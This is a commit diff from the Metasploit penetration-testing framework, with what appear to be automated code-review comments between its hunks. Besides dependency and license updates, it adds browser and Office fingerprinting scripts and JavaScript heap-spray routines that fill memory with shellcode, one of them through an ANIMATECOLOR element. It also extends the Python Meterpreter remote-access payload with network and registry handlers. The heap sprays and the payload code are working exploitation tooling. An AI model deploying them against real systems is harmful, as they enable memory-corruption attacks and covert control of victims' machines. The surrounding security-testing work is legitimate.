bug/bundler_fix
Geyslan G. Bem 2013-11-11 14:29:19 -03:00
commit e3641158d9
2487 changed files with 15432 additions and 11452 deletions


@ -7,6 +7,7 @@ hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>

2
.rspec

@ -1,2 +1,2 @@
--color
--format documentation
--format Fivemat


@ -40,6 +40,8 @@ group :development, :test do
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end


@ -18,6 +18,7 @@ GEM
diff-lcs (1.2.4)
factory_girl (4.2.0)
activesupport (>= 3.0.0)
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
@ -62,6 +63,7 @@ DEPENDENCIES
activesupport (>= 3.0.0)
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
msgpack

347
LICENSE

@ -12,7 +12,7 @@ License: BSD-3-clause
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2013-Mar-25
# Last updated: 2013-Nov-04
#
Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc.
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

51
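--- /dev/null
+++ b/data/js/detect/addons.js
@@ -0,0 +1,51 @@
+window.addons_detect = { };
+/**
+* Returns the version of Microsoft Office. If not found, returns null.
+**/
+window.addons_detect.getMsOfficeVersion = function () {
+var version;
+var types = new Array();
+for (var i=1; i <= 5; i++) {
+try {
+types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+}
+catch (e) {
+types[i-1] = null;
+}
+}
+if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+types[3] == 'object' && types[4] == 'object')
+{
+version = "2012";
+}
+else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+types[3] == 'object' && types[4] == null)
+{
+version = "2010";
+}
+else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+types[3] == null && types[4] == null)
+{
+version = "2007";
+}
+else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+types[3] == null && types[4] == null)
+{
+version = "2003";
+}
+else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+types[3] == null && types[4] == null)
+{
+// If run for the first time, you must manullay allow the "Microsoft Office XP"
+// add-on to run. However, this prompt won't show because the ActiveXObject statement
+// is wrapped in an exception handler.
+version = "xp";
+}
+else {
+version = null;
+}
+return version;
+}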
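Review bot: The branch that assigns `version = "2012";` covers the case where all five `SharePoint.OpenDocuments.1`..`.5` ProgIDs instantiate, but there is no Office 2012 release; the version after 2010 is Office 2013, so this string is presumably a typo and any caller comparing against the real version name will never match. `var types = new Array();` can be the literal `[]`, and the `typeof` results are plain strings, so `===` would be the clearer comparison throughout the chain. The comment in the XP branch has a typo, `manullay` → `manually`.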


@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css;
}
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//--
// Client
//--
@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) {
ua_version = '22.0'
if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document &&
document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0'
ua_version = '21.0';
} else if ('imul' in Math) {
ua_version = '20.0'
ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0'
ua_version = '19.0';
} else if ('devicePixelRatio' in window) {
ua_version = '18.0'
ua_version = '18.0';
} else if ('createElement' in document &&
document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) {
ua_version = '17.0'
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0'
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0'
ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0'
ua_version = '14.0';
} else if ('Map' in window) {
ua_version = "13.0"
ua_version = "13.0";
} else if ('mozConnection' in navigator) {
ua_version = "12.0";
} else if ('mozVibrate' in navigator) {
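Review bot: The new Firefox 24 probe `'DeviceStorage' in window && window.DeviceStorage && 'default' in window.DeviceStorage.prototype` throws a TypeError if `window.DeviceStorage` is ever truthy but has no `prototype` object, because `in` requires an object on its right-hand side; every other test in this chain is written so that it cannot throw, so guard the prototype too: `'DeviceStorage' in window && window.DeviceStorage && window.DeviceStorage.prototype && 'default' in window.DeviceStorage.prototype`. The other additions here (`input_type_is_valid`, the `css_is_valid('background-attachment', ...)` check and the semicolon fixes) look fine. The enclosing `getVersion` function begins before and ends after the hunk.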


@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}


@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}


@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}


@ -0,0 +1,27 @@
function ajax_download(oArg) {
var method = oArg.method;
var path = oArg.path;
var data = oArg.data;
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}
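Review bot: The argument check `if (method == path) { throw "Missing parameter 'path'"; }` compares the HTTP method to the path instead of testing whether `path` was supplied, so a missing path reaches `xmlHttp.open` unreported while a path that happens to equal the method name is wrongly rejected; it should read `if (path == undefined) { throw "Missing parameter 'path'"; }`. `xmlHttp` is assigned without `var` in both branches and so leaks as an implicit global; declare it with `var xmlHttp;` before the `if (window.XMLHttpRequest)` check. Worth a comment that the request is deliberately synchronous (`open(method, path, false)`) and that any status other than 200 returns `null` rather than surfacing the error.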

126
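--- /dev/null
+++ b/data/js/utils/base64.js
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+// private property
+_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+// private method
+_utf8_encode : function ( input ){
+input = input.replace(/\r\n/g,"\\n");
+var utftext = "";
+var input_idx;
+for (input_idx = 0; input_idx < input.length; input_idx++) {
+var chr = input.charCodeAt(input_idx);
+if (chr < 128) {
+utftext += String.fromCharCode(chr);
+}
+else if((chr > 127) && (chr < 2048)) {
+utftext += String.fromCharCode((chr >> 6) | 192);
+utftext += String.fromCharCode((chr & 63) | 128);
+} else {
+utftext += String.fromCharCode((chr >> 12) | 224);
+utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+utftext += String.fromCharCode((chr & 63) | 128);
+}
+}
+return utftext;
+},
+// public method for encoding
+encode : function( input ) {
+var output = "";
+var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+var input_idx = 0;
+input = Base64._utf8_encode(input);
+while (input_idx < input.length) {
+chr1 = input.charCodeAt( input_idx++ );
+chr2 = input.charCodeAt( input_idx++ );
+chr3 = input.charCodeAt( input_idx++ );
+enc1 = chr1 >> 2;
+enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+enc4 = chr3 & 63;
+if (isNaN(chr2)) {
+enc3 = enc4 = 64;
+} else if (isNaN(chr3)) {
+enc4 = 64;
+}
+output = output +
+this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+}
+return output;
+},
+// public method for decoding
+decode : function (input) {
+var output = "";
+var chr1, chr2, chr3;
+var enc1, enc2, enc3, enc4;
+var i = 0;
+input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+while (i < input.length) {
+enc1 = this._keyStr.indexOf(input.charAt(i++));
+enc2 = this._keyStr.indexOf(input.charAt(i++));
+enc3 = this._keyStr.indexOf(input.charAt(i++));
+enc4 = this._keyStr.indexOf(input.charAt(i++));
+chr1 = (enc1 << 2) | (enc2 >> 4);
+chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+chr3 = ((enc3 & 3) << 6) | enc4;
+output = output + String.fromCharCode(chr1);
+if (enc3 != 64) {
+output = output + String.fromCharCode(chr2);
+}
+if (enc4 != 64) {
+output = output + String.fromCharCode(chr3);
+}
+}
+output = Base64._utf8_decode(output);
+return output;
+},
+_utf8_decode : function (utftext) {
+var string = "";
+var input_idx = 0;
+var chr1 = 0;
+var chr2 = 0;
+var chr3 = 0;
+while ( input_idx < utftext.length ) {
+chr1 = utftext.charCodeAt(input_idx);
+if (chr1 < 128) {
+string += String.fromCharCode(chr1);
+input_idx++;
+}
+else if((chr1 > 191) && (chr1 < 224)) {
+chr2 = utftext.charCodeAt(input_idx+1);
+string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+input_idx += 2;
+} else {
+chr2 = utftext.charCodeAt(input_idx+1);
+chr3 = utftext.charCodeAt(input_idx+2);
+string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+input_idx += 3;
+}
+}
+return string;
+}
+};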
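Review bot: `_utf8_encode` starts with `input.replace(/\r\n/g,"\\n")`, which as printed replaces each CRLF with the two characters backslash and `n` rather than with a newline, so encoded text silently differs from the input; the webtoolkit original this is copied from uses `"\n"`, and the doubled backslash looks like an escaping slip from embedding the file elsewhere. The same slip appears in `decode`, where the filter `/[^A-Za-z0-9\+\/\\=]/g` lets a literal backslash through; `_keyStr.indexOf` then returns -1 for it and the shifts on `chr1`..`chr3` produce garbage bytes, so the class should be `/[^A-Za-z0-9\+\/\=]/g`. `_utf8_decode` also reads `charCodeAt(input_idx+1)`/`(input_idx+2)` past the end of a truncated multi-byte sequence, yielding NaN; a bounds check or a comment stating that input is trusted encoder output would make that explicit.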

BIN
data/meterpreter/common.lib Executable file

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
@ -273,6 +275,9 @@ ERROR_FAILURE = 1
# errors.
ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
@ -290,6 +295,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo():
if not has_windll:
return None
@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
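Review bot: `stdapi_net_resolve_host` and `stdapi_net_resolve_hosts` map the request's `WIN_AF_INET`/`WIN_AF_INET6` values onto the local `socket.AF_*` constants, but the `TLV_TYPE_ADDR_TYPE` they pack back carries `result['family']` untranslated; on non-Windows hosts `socket.AF_INET6` is not 23, so the peer presumably receives a family value it does not recognise (confirm against whatever consumes this TLV on the other side), and the error path in the plural variant, `{'family':family, 'packed_address':''}`, has the same problem. The forward mapping `if family == WIN_AF_INET ... else: raise Exception('invalid family')` is duplicated verbatim in both handlers; a small helper that converts in both directions would keep them in step. The singular handler also lets `socket.error` from a failed lookup propagate out of the handler whereas the plural one catches it and returns an empty address; if that asymmetry is intended it deserves a one-line comment.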


@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0]
return {}
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
@ -271,7 +289,7 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
